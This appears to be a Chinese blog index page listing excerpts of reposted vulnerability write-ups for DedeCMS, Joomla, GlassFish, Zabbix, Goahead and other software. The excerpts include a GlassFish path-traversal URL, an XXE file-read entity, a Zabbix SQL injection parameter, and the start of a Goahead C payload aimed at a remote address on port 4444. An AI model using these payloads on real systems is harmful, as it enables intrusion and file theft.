漏洞列表
文章平均质量分 76
PD_3569
这个作者很懒,什么都没留下…
展开
-
DeDecms(织梦CMS)最新版任意用户密码重置漏洞分析
http://docs.ioin.in/writeup/xianzhi.aliyun.com/_forum_topic_1926/index.htmlDeDecms(织梦CMS) V5.7.72 正式版20180109 (最新版)由于前台resetpassword.php中对接受的safeanswer参数类型比较不够严格,遭受弱类型比较攻击导致了远程攻击者可以在前台会员中心绕过转载 2018-01-11 19:30:32 · 11384 阅读 · 0 评论 -
Joomla内核SQL注入漏洞(CVE-2018-8045)
Joomla! Core SQL注入漏洞NSFOCUS ID39158CVE IDCVE-2018-8045受影响版本Joomla! Joomla! 3.5.0-3.8.5漏洞点评Joomla是一套网站内容管理系统,使用PHP语言和MySQL数据库开发。Joomla! 3.5.0 -3.8.5版本对SQL语句内的变量缺少类型转换,导致User Notes列表视图内SQL注 入漏洞,可使攻击者访问或...转载 2018-04-01 13:12:48 · 7505 阅读 · 0 评论 -
XXE blind 简单poc & 读文件
原理简介:https://blog.csdn.net/u011721501/article/details/43775691首先你要确定是xml格式的数据,content-type是xml,PHP和JAVA利用有点不一样PHP 利用方式读取文件POC 利用:自己vps放置xxe.xml<!ENTITY % payload SYSTEM "php://fil...原创 2018-03-27 19:46:51 · 3198 阅读 · 0 评论 -
RPO & share your mind
http://pupiles.com/qiangwangbei.html好久前有文章关于 RPO,当时忘记在做什么了,反正好久没看过文章了 ... 这么快就用上了 ... 有一次教训 ...Share your mind这题必须要写一下自己的踩坑经历,首先进去浏览一下页面功能,有个提交bug页面的地方,还有个可以新建文章的地方最后就是浏览文章(但是只能浏览自己发的文章),首先想到的就是xss+cs...转载 2018-03-27 21:59:04 · 490 阅读 · 0 评论 -
CactiEZ 中文版snmp默认团体名漏洞
http://www.freebuf.com/vuls/3208.html这个漏洞真强大啊,虽然是信息搜集,但是把服务器上的所有软甲和版本号都直接给你了 ...佩服,实在是佩服,这个功能的实现者 ...CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改导致可以远程读取目标设备主机信息。如:snmputil.exe walk 127.0.0.1 public ....转载 2018-03-28 11:27:07 · 1814 阅读 · 0 评论 -
glassfish任意文件读取漏洞(4.0/4.1)
相关厂商:glassfish漏洞编号:wooyun-2010-0144595漏洞详情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0...转载 2018-03-28 19:34:51 · 1926 阅读 · 0 评论 -
Joomla注入漏洞(CVE-2018-6605)复现分析
https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&mid=2247489109&idx=1&sn=0c9a3388e4ac1389897b4449fb3af110&chksm=9bcea13facb928293ac06fede04f15d564b60a5e8ad26208f28ebe175017aa3d2144617...转载 2018-04-18 22:41:46 · 2448 阅读 · 0 评论 -
解析漏洞总结
一、IIS 5.x/6.0解析漏洞IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 wooyun.asp,那么/wooyun.asp/1.jpg将被当作asp文件来执行。假设黑阔可以控...转载 2018-05-20 11:34:01 · 305 阅读 · 0 评论 -
php 反序列化 && 常见的利用
http://www.lmxspace.com/2018/05/03/php-unserialize-%E5%88%9D%E8%AF%86/第一章 写在开头在OWASP TOP10中,反序列化已经榜上有名,但是究竟什么是反序列化,我觉得应该进下心来好好思考下。我觉得学习的时候,所有的问题都应该问3个问题:what、why、how。what:什么是反序列化,why:为什么会出现反序列化漏洞,how:...转载 2018-06-20 11:25:24 · 3116 阅读 · 0 评论 -
CVE-2018-12613 PhpMyadmin后台文件包含分析
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...转载 2018-06-27 14:54:06 · 10415 阅读 · 3 评论 -
骚年,看我如何把 PhantomJS 图片的 XSS 升级成 SSRF/LFR
https://paper.seebug.org/344/在一次赏金程序中,我碰见这么一个请求,用户输入然后生成图片供下载。过了一会儿,我便把图片内部的 XSS 升级成服务端的任意文件读取漏洞。因为程序的隐私性,所以我将尽力抹掉敏感信息。原始请求如下:https://website/download?background=file.jpg&author=Brett&header=T...转载 2018-03-24 16:50:09 · 677 阅读 · 0 评论 -
从SQL注入到Getshell:记一次禅道系统的渗透
https://zhuanlan.zhihu.com/p/34275981?utm_source=qq&utm_medium=social此过程为某站点的渗透记录,过程一波三折,但归根结底都是粗心大意造成的,不过自我认为在这个排坑的过程中也学习到了很多。确认版本首先可以通过接口来确认一下当前禅道的版本。http://chaitin.cn/index.php?mode=getconfigS...转载 2018-03-08 14:03:22 · 12784 阅读 · 0 评论 -
Django的Secret Key泄漏导致的命令执行实践
http://www.polaris-lab.com/index.php/archives/426/0x01 Secret Key的用途和泄漏导致的攻击面Secret Key主要用于加密、签名,下面是官方文档的说明:The secret key is used for:All sessions if you are using any other session backend thandjang...转载 2018-02-19 10:45:11 · 4286 阅读 · 0 评论 -
Apache Solr远程代码执行漏洞(CVE-2017-12629)
http://www.freebuf.com/sectool/159970.html一 漏洞简介Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。二 漏洞利用2.1. 环境介绍Ubuntu14 64位环境(sol转载 2018-01-22 17:58:25 · 5706 阅读 · 0 评论 -
Dedecms 后台getshell 5.7 SP2
http://foreversong.cn/archives/963虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/Dede转载 2018-01-15 09:50:54 · 3659 阅读 · 0 评论 -
PHP CVE-2018-5711 - Hanging Websites by a Harmful GIF(Dos)
http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.htmlAffectedAll PHP versionPHP 5 PHP 7.0 PHP 7.1 PHP 7.2 Vulnerability DetailsThe vulnerability is on the file e转载 2018-01-24 10:34:08 · 1463 阅读 · 0 评论 -
Zabbix漏洞总结
http://vinc.top/2017/04/18/zabbix%e6%bc%8f%e6%b4%9e%e6%80%bb%e7%bb%93/影响版本1.8.5-1.8.9利用前提需要登录,默认口令 admin/zabbix或者是guest/空使用Guest账户登录报错注入httpmon.php?applications=2 and (select 1 fro转载 2018-01-24 11:05:18 · 5947 阅读 · 0 评论 -
Smarty <= 3.1.32 PHP代码执行漏洞分析—【CVE-2017-1000480】
https://xianzhi.aliyun.com/forum/topic/1983smarty简介smarty是一个php模板引擎,其项目地址:https://github.com/smarty-php/smarty。smarty据有模板编译功能。当访问一个模板文件时,smarty会根据模板文件在设置的编译目录中生成对应的php脚本(即编译文件),此后若再次访问该模板文件时转载 2018-01-24 14:16:24 · 2013 阅读 · 0 评论 -
未授权访问漏洞总结(redis,couchdb,jenkins,mongo,Elasticsearch,Memcache,Docker)
0x01 介绍Copy from https://paper.seebug.org/409/未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。目前主要存在未授权访问漏洞的有:NFS 服务,Samba 服务,LDAP,Rsync,FTP,GitLab,Jenkins,MongoDB,转载 2018-01-24 22:01:12 · 4084 阅读 · 0 评论 -
Goahead 利用 CVE-2017-17562
#include #include #include #include #include #define REMOTE_ADDR "172.17.0.1"#define REMOTE_PORT 4444static void before_main(void) __attribute__((constructor));static void before_main(void)转载 2018-01-25 13:50:05 · 493 阅读 · 0 评论 -
Gitstack Remote code exec
https://blogs.securiteam.com/index.php/archives/3557Vendor responseWe tried to contact GitStack since October 17 2017, repeated attempts to establish contact were answered, but no details have been pr转载 2018-01-18 11:49:24 · 392 阅读 · 0 评论 -
PostgreSQL 远程代码执行漏洞分析及利用—【CVE-2018-1058】
https://xianzhi.aliyun.com/forum/topic/2109漏洞描述A flaw was found in the way Postgresql allowed a user to modify the behavior of a query for other users. An attacker with a user account could use this f...转载 2018-03-07 10:05:45 · 2860 阅读 · 0 评论